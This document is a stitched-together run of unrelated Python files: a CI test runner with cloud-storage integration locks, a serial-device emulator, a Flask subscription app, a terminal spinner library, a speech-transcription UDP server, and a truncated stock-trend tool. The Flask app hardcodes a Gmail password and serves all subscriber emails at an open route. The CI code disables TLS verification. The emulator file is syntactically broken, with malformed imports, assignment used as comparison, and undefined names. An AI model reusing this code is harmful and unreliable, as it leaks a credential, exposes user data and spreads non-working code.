print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: There is more then one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not res_dict.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If lock attempt has failed - yields False, if it succeeds - yields True
* Once the test is done- will unlock all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
This integration safely unlocks the test's integrations.
If an unexpected error occurs - this method will log it's details and other tests execution will continue
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instancing the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
This integration safely locks the test's integrations and return it's result
If an unexpected error occurs - this method will log it's details and return False
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
if integration_names:
print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
else:
print_msg = 'No integrations to lock'
prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If given workflow ID is the same as the current workflow, will simply return True
else it will query circleci api for the workflow and return the status
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file was exist with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can have one integration as a string and sometimes a list of integrations- this methods
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
the integration names in a list for all the integrations that takes place in the test
specified in test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
Each file should contain <circle-ci-build-number>:<test-timeout>
where the <circle-ci-build-number> part is for debugging and troubleshooting
and the <test-timeout> part is to be able to unlock revoked test files.
If for any of the integrations, the lock file creation will fail- the already created files will be cleaned.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The time out
thread_index:
Returns:
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, Create file with precondition failed.'
f'delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying build number is the same as current build number to avoid deleting other tests lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that has a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that passed since the creation of the 'lock_file' is more then 'lock_timeout'.
If not- it means that the integration represented by the lock file is currently locked and is tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has expired it's timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 30 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
scu.py
|
from enum import Enum
import time
import serial
from threading
class Status(Enum):
STOPPED = 'S'
JOGGINGFORWARD ='F'
JOGGINGREVERSE= 'R'
PAUSED = 'P'
ERROR = 'E'
class ProtcolMessage(Enum):
ENQ = chr(133) # <ENQ> in acsii + 128
NULL = chr(128) # <Null>: 0 + 128
ACK = chr(134) # 6 + 128
CR = chr(141) # 13 + 128
#CR = chr(13)
class CommandCode(Enum):
SCAN = "G"
PAUSE = "P"
STOP = "S"
HOME = "H"
SLEW = '9'
JOGFORWARD = "F"
JOGREVERSE = "R"
FASTERJOG = "Q"
SLOWERJOG = "Z"
SCANMODE = "B"
UNITS = "U"
BURSTFIRE = "L"
NEXTPOSITION = "N"
SHGRETURN = "C"
SHGALIGN = "K"
SHGFORWARD = "D"
SHGREVERSE = "E"
SHGJOGCRYSTAL = "I"
SHGJOGPRISM = "J"
class SCU():
def __init__(self):
self.units=["W","D","N"]
self.unit = "W" #wavenumbers
self.position = 15000 #Start at 15000
self.status = "S" #Start as stopped
def slew(self, new_position):
if new_position < self.position:
self.status = Status.JOGGINGREVERSE
while new_position != self.position and self.status != Status.STOPPED:
self.position -= 1
time.sleep(.1)
else:
self.status = Status.JOGGINGFORWARD
while new_position != self.position and self.status != Status.STOPPED:
self.position += 1
time.sleep(.1)
self.status = Status.STOPPED
def jog_forward(self):
self.status = Status.JOGGINGFORWARD
while new_position != self.position and self.status != Status.STOPPED and getatrr(self.jog_forward_thread, "forward_run", True):
self.position += 1
time.sleep(.1)
self.status = Status.STOPPED
def jog_reverse(self):
self.status = Status.JOGGINGREVERSE
while new_position != self.position and self.status != Status.STOPPED and getatrr(self.jog_reverse_thread, "reverse_run", True):
self.position -= 1
time.sleep(.1)
self.status = Status.STOPPED
def to_status(self):
return self.status+self.unit+str(self.position)
def stop(self):
if hasattr(self, "jog_reverse_thread") and self.jog_reverse_thread is not None:
self.jog_reverse_thread.reverse_run = False
self.jog_reverse_thread.join()
if hasattr(self, "jog_forward_thread") and self.jog_forward_thread is not None:
self.jog_forward_thread.forward_run = False
self.jog_forward_thread.join()
self.status = Status.STOPPED
def change_unit(self):
next_index = self.units.index(self.unit) +1
if next_index == 3:
next_index = 0
self.unit = self.units[next_index]
class SerialParser():
def __init__(self):
self.ser = serial.Serial(port="/dev/ttyS0", baudrate=9600, timeout = .01
, bytesize=serial.EIGHTBITS, stopbits=2, rtscts=True)
self.scu = SCU()
self.poll()
def poll(self):
null_count = 0
while True:
self.ser.flushInput()
if null_count == 45:
print "Writing enq"
self.ser.write(ProtcolMessage.ENQ.value)
response_counter = 0
command_buffer = list()
while response_counter <100: #Limit to 100 characters recieved
recieved = self.ser.read()
if recieved != ProtcolMessage.CR.value and recieved != ProtcolMessage.ACK.value :
command_buffer.append(recieved)
response_counter += 1
else:
if recieved == ProtcolMessage.ACK.value:
command = ProtcolMessage.ACK.value
else:
command = self.parse_command(command_buffer)
self.execute_command(command)
print command_buffer
break
null_count = 0
else:
self.ser.write(ProtcolMessage.NULL.value)
null_count += 1
def parse_command(self, command_buffer):
command = command_buffer[0]
print command
return command
def execute_command(self,command, message=None):
print "Command-->"+str(command)
if command == ProtcolMessage.ACK.value or command == "0":
print "Ack recieved"
message = self.scu.to_status()+"CS" + ProtcolMessage.CR.value
self.return_status()
elif command = "U":
self.scu.change_unit()
self.return_status()
elif command = "F":
self.scu.jog_forward_thread = threading.Thread(target = lambda: self.scu.jog_forward())
self.scu.jog_forward_thread.start()
self.return_status()
elif command = "R":
self.scu.jog_reverse_thread = threading.Thread(target = lambda: self.scu.jog_reverse())
self.scu.jog_reverse_thread.start()
self.return_status()
elif command = "S":
self.scu.stop()
self.return_status()
else:
self.return_error()
def return_status(self):
self.ser.write(self.scu.to_status()+"CS" + ProtcolMessage.CR.value)
def return_error(self):
self.ser.write("EE00000"+ProtcolMessage.CR.value)
ser_parse = SerialParser()
|
__init__.py
|
from flask import Flask, render_template, request, redirect, url_for
from flask_mail import Mail, Message
from threading import Thread
from flask_sqlalchemy import SQLAlchemy
import os
from models import *
base_url = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USERNAME'] = 'kfu.anatomy.2018@gmail.com'
app.config['MAIL_PASSWORD'] = 'z31aedc170f8'
app.config['MAIL_USE_TLS'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(base_url, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
mail = Mail(app)
db = SQLAlchemy(app)
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_message(form, email):
msg = Message('Новый подписчик!', recipients=['kfu.anatomy.2018@gmail.com'], sender='kfu.anatomy.2018@gmail.com')
msg.html = render_template('email.html', result=form)
msg.body = 'New subscriber ' + email
t = Thread(target=send_async_email, args=[app, msg])
t.start()
return t
@app.route('/', methods=['POST', 'GET'])
def index():
if request.method == 'POST':
if Email.query.filter_by(email=request.form['email']).first() == None:
print('OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOKKKKKKKKKKKKKKKKKKKKKKKKKKKKK')
e = Email(email=request.form['email'])
db.session.add(e)
db.session.commit()
send_message(request.form, request.form['email'])
return redirect(url_for('index'))
return render_template('index.html')
@app.route('/email')
def email_page():
q = Email.query.all()
result = ''
for i in q:
result += i.email + '\n'
return result
if __name__ == '__main__':
app.run()
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (colored_frame, decode_utf_8_text, get_environment,
get_terminal_columns, is_supported, is_text_type)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self._enabled = enabled # Need to check for stream
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers.
Returns
-------
None
"""
return self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
# Subtract to the current terminal size the max spinner length
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
elif 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
if not self._enabled:
return self
self._stream.write('\r')
self._stream.write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
frame = self.frame()
output = '\r{0}'.format(frame)
self.clear()
self._stream.write(output)
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text['frames']) == 1:
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide(stream=self._stream)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if not self._enabled:
return self
if self._spinner_thread:
self._stop_spinner.set()
self._spinner_thread.join()
self._frame_index = 0
self._spinner_id = None
self.clear()
if self._stream.isatty():
cursor.show(stream=self._stream)
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
self._stream.write(output)
return self
|
opus_server.py
|
import asyncio
import zlib
import queue
import threading
import audioop
from google.cloud import speech
from opuslib import Decoder
from config.config import Config
from config.config import Server
from config.config import Opus
buffer = queue.Queue()
buffer_response = queue.Queue()
dec = Decoder(Opus.rate, Opus.channels)
def chunks():
while True:
try:
yield buffer.get(timeout = 1)
except queue.Empty:
break
def get_transcription():
while True:
generator = chunks()
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=Config.encoding,
language_code=Config.language,
sample_rate_hertz=Opus.rate
)
config = speech.types.StreamingRecognitionConfig(config=config, interim_results = True)
requests = (speech.types.StreamingRecognizeRequest(audio_content=chunk) for chunk in generator)
results = client.streaming_recognize(config, requests)
for result in results:
print(result)
for data in result.results:
for parts in data.alternatives:
buffer_response.put(parts.transcript)
def activate_job():
background = threading.Thread(target=get_transcription, args=())
background.daemon = True
background.start()
class EchoServerProtocol(asyncio.DatagramProtocol):
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
message = dec.decode(zlib.decompress(data), Opus.chunk)
buffer.put(message)
if buffer_response.empty():
self.transport.sendto(b'', addr)
else:
self.transport.sendto(buffer_response.get().encode(), addr)
def run_server():
loop = asyncio.get_event_loop()
listen = loop.create_datagram_endpoint(
EchoServerProtocol, local_addr=(Server.host, Server.port))
transport, protocol = loop.run_until_complete(listen)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
transport.close()
loop.close()
if __name__ == '__main__':
activate_job()
run_server()
|
console_trend.py
|
import time
import threading
import logging
import matplotlib.pyplot as plt
from analysis.trend import SupportResistance
from data import store as store
from utils import ui
_logger = ui.get_logger(logging.WARNING, logfile='')
class Interface:
def __init__(self, tickers: list[str] = [], days: int = 1000, quick: bool = False, exit: bool = False):
self.tickers = [t.upper() for t in tickers]
self.days = days
self.quick = quick
self.exit = exit
self.trend: SupportResistance = None
self.task: threading.Thread = None
quit = False
for ticker in tickers:
if not store.is_ticker(ticker.upper()):
ui.print_error(f'Invalid ticker: {ticker}')
quit = True
break
if quit:
pass
elif self.exit:
self.calculate_support_and_resistance()
else:
self.main_menu()
def main_menu(self):
while True:
menu_items = {
'1': 'Change Ticker',
'2': 'Add Ticker',
'3': f'Days ({self.days})',
'4': 'Calculate Support & Resistance',
'0': 'Exit'
}
if self.tickers:
menu_items['1'] = f'Change Ticker ({", ".join(self.tickers)})'
if self.quick:
menu_items['4'] += ' (quick)'
selection = ui.menu(menu_items, 'Select Operation', 0, len(menu_items)-1)
if selection == 1:
self.select_ticker()
if selection == 2:
self.add_ticker()
elif selection == 3:
self.select_days()
elif selection == 4:
self.calculate_support_and_resistance()
elif selection == 0:
self.exit = True
if self.exit:
break
def select_ticker(self):
valid = False
while not valid:
ticker = input('Please enter symbol, or 0 to cancel: ').upper()
if ticker != '0':
valid = store.is_ticker(ticker)
if valid:
self.tickers = [ticker]
else:
ui.print_error('Invalid ticker symbol. Try again or select "0" to cancel')
else:
break
def add_ticker(self):
valid = False
while not valid:
ticker = input('Please enter ticker, or 0 to cancel: ').upper()
if ticker != '0':
valid = store.is_ticker(ticker)
if valid:
self.tickers += [ticker]
else:
ui.print_error('Invalid ticker. Try again or enter 0 to cancel')
else:
break
def select_days(self):
self.days = 0
while self.days < 30:
self.days = ui.input_integer('Enter number of days: ', 30, 9999)
def calculate_support_and_resistance(self):
if self.tickers:
ui.progress_bar(0, 0, reset=True)
for ticker in self.tickers:
if self.quick:
self.trend = SupportResistance(ticker, days=self.days)
else:
methods = ['NSQUREDLOGN', 'NCUBED', 'HOUGHLINES', 'PROBHOUGH']
extmethods = ['NAIVE', 'NAIVECONSEC', 'NUMDIFF']
self.trend = SupportResistance(ticker, methods=methods, extmethods=extmethods, days=self.days)
self.task = threading.Thread(target=self.trend.calculate)
self.task.start()
self._show_progress()
figure = self.trend.plot()
plt.figure(figure)
print()
plt.show()
else:
ui.print_error('Enter a ticker before calculating')
def _show_progress(self) -> None:
while not self.trend.task_error:
pass
if self.trend.task_error == 'None':
while self.trend.task_error == 'None':
time.sleep(0.20)
ui.progress_bar(0, 0, suffix=self.trend.task_message)
if self.trend.task_error == 'Hold':
pass
elif self.trend.task_error == 'Done':
ui.print_message(f'{self.trend.task_error}: {self.trend.task_total} lines extracted in {self.trend.task_time:.1f} seconds')
else:
ui.print_error(f'{self.trend.task_error}: Error extracting lines')
else:
ui.print_message(f'{self.trend.task_error}')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Technical Analysis')
parser.add_argument('-t', '--tickers', nargs='+', help='Run using tickers')
